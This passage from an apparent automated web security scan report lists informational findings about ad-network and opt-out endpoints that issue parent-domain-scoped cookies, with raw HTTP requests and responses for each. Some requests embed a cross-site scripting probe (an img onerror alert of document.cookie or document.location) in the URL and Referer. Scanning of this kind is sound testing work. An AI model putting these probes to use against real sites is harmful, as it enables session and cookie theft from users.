Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtDK2qi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWScS0GIKFUc2BVmtMVyiFrcMAGx9JaM%253D; TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwId7s1IjUnMSSVOLMrgUAc5lBWA%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdjrEKAjEQBf8l%252FUF2k93NxkpU8BoLxVqS7AWsxUr8d%252BOBjd0r5jFTcsyvRw7ZXee924yF2XmgZBw5Yfdce1LB6rFpElKKpis3Htvj70ESLDEV8YASBAKKhaZLMei9hfLlALJ73u12QR%252FPh1UGlB1Q8BoBkEUB%252FT85n3arhLOrYUSQ0cTUcYq%252Bp6ko6tQqY01mrSwj7f0BAds11Q%253D%253D; expires=Mon, 02-Jan-2012 02:36:37 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkkEOgyAQRe%252FiCWYGYWDceIxuXbho0l27M969tCKxCMnYhQGS9%252BT%252FDJMQyvIUJOkQ%252BpEQxhACdcMkJMtdcIifYx8X2LfriccPbwqehu149DhrOiOu0P%252BQDJxId%252F73fJsf02vuGkazhb3Y2v7X2ipbbzdRVMCQOtmBtxeSJU07Dyrm4TwkklqZLNY6fD3Yt2e%252B7JDvwcLjrGmNfY5Qn3s12YFX38NZu5qMfC3Z9pIT7ys8tl6%252BKTzOms5Y31iYDNo%253D; expires=Mon, 02-Jan-2012 02:36:37 GMT; path=/; domain=.exelator.com
Location: http://msite.martiniadnetwork.com/data/index/ds/exelate/absid/21051315103139790868608/segments//
Content-Length: 0
Date: Sun, 04 Sep 2011 02:36:37 GMT
Server: HTTP server


15.74. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.3974934 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtLKwqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaGRri1WMKFUc2BlmtMbKEIUTC0QndFDOYBE7VyOZYgiTMDdANMYEIoys0M8Sq0MwQu0KERbVkeYVkZ%252BNwJHYnAQCc%252FGrs; TFF=eJydkTEOwyAMRe%252BSE3y7CAezcIyuDAyVuqVblLuXirapEiGZDsggvW%252F7iazkdV2UWCeCS5iRQgg8xays600p1iOQWvC5bieeXvzlwHNsz9%252BcfGO2RK1wHZLPvcu13POj9Hq7jgUPWvN%252F1my1fk8SJIDsm%252B380GYtZv4PwYiDpzGHnR9yaDGzgycTuT0BGeDKhw%253D%253D

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 01-Sep-2021 10:59:28 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 01-Sep-2021 10:59:28 GMT; path=/; domain=.exelator.com
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Content-type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3


15.75. http://nai.btrll.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.6192102 HTTP/1.1
Host: nai.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:13:05 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/; domain=.btrll.com
Set-Cookie: BR_MBBV=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/
Set-Cookie: DRN1=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/; domain=.btrll.com
Set-Cookie: DRN1=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /nai/verify?nocache=0.6192102
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.76. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Sat, 04-Sep-2010 11:16:22 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 11:16:23 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
Content-Type: text/html


15.77. http://notrack.specificclick.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&cdn4=1 HTTP/1.1
Host: notrack.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=m0NgwKlU3fGJkA

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:25:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=1; expires=Sun, 04-Sep-2011 10:25:23 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=1; expires=Sun, 04-Sep-2011 10:25:23 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 11:25:23 GMT; path=/; domain=.specificclick.net
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificclick.net/CookieCheck.php?refreshCheck=1&optThis=1&result=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


15.78. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 10:59:28 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


15.79. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle?RM_Exclude=& HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03PUO3022VvT|O1022bkP|O1022jF2; expires=Wed, 04-Sep-13 03:30:23 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2090
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N553.martinimedianet/B5114832.11;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L2
...[SNIP]...

15.80. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.cookie%29%3E1e77da311f0%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21001313421770843092046&&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:53:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFH=011R03lU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2000
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('<iframe id=');
document.write ("'");
document.write ('aa3600d0');
document.write ("'");
document.write (' name=');
document.write ("'");
document.write ('aa3600
...[SNIP]...

15.81. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21051315103139790868608&&tax23_RefDocLoc=http://www.google.com/search&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:51 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R02ZNO2022VvT|O1022jF2; expires=Wed, 04-Sep-13 02:39:51 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1923
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<iframe id=');
document.write ("'");
document.write ('4364c62f');
document.write ("'");
document.write (' name=');
document.write ("'");
document.write ('4364c6
...[SNIP]...

15.82. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R02P3P3022VvT|P1022jF2; expires=Wed, 04-Sep-13 03:27:15 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="
...[SNIP]...

15.83. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.location%29%3E1e77da311f0%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21001313421770843092046&&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2; martinicrt=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:03:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03t7O3022VvT|O3022bxY|O6022bxa|O4022fgv|O1022jF2; expires=Wed, 04-Sep-13 04:03:10 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3684
Content-Type: application/x-javascript

document.write ('<script type="text/javascript">\n');
document.write ('\n');
document.write ('function pr_swfver(){\n');
document.write ('\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\
...[SNIP]...

15.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022VvT|O1022jF2; martinicrt=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:03:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03vcO3022bxY|O6022bxa|O1022jF2; expires=Wed, 04-Sep-13 04:03:43 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="
...[SNIP]...

15.85. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.4050807 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=eoMPggRrV06L1ODhUblQrQ; s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Sat, 04-Sep-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Sat, 04-Sep-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Sat, 04-Sep-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:12:54 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>

15.86. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4642/5271/7551-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4642/5271/7551-15.js?cb=0.3750513994600624 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; nus_2046=0.00; ses2=5032^2&9346^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4642/5271; expires=Sun, 04-Sep-2011 03:38:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 03:38:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1&5271^2; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=105703; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3162001.js^1^1315103896^1315103896&3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 02:38:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2230

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162001"
...[SNIP]...

